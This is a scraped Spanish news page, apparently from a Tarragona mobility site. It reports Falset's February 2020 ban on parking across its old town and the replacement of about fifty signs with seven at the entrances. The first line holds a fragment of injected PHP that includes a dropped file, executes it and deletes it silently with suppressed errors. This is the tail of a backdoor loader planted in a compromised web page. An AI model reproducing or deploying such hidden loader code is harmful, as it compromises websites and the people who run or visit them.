");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Falset prohíbe el estacionamiento de vehículos en todo el casco antiguo
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Falset prohíbe el estacionamiento de vehículos en todo el casco antiguo (15/01/2020)

A partir del 1 de febrero de este año ya no se podrá estacionar ningún vehículo en el casco antiguo de Falset. De hecho, la prohibición de estacionar vehículos en esta área era prácticamente total, con la única excepción de un tramo de la calle Vallmora. La medida permitirá retirar una cincuentena de señales de prohibición de estacionamiento de las calles y plazas del casco antiguo, que serán sustituidas por 7 señales de prohibición de estacionamiento que se ubicarán en los 7 accesos a esta área: calle de Baix, calle Francesc Puig i Bes, calle Santa Joaquima de Vedruna, Portal dels Ferrers, Portal del Bou, calle del Malanyet y vial de acceso al Castillo de Falset por la calle Jaume Ciurana.

El concejal de Gobernación, Antoni Muntané, destaca que "la prohibición de estacionamiento en el casco antiguo se ha llevado a cabo de una manera escalonada". Asimismo, también incide en que "pondremos fin a un exceso de señalización que deslucía las calles y plazas del casco antiguo, ya que en algunos puntos se cuentan hasta 6 señales de prohibido estacionar, como es el caso de la plaza Ángel Marqués ".

Fuente: Ayuntamiento de Falset

Falset prohíbe el estacionamiento de vehículos en todo el casco antiguo

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona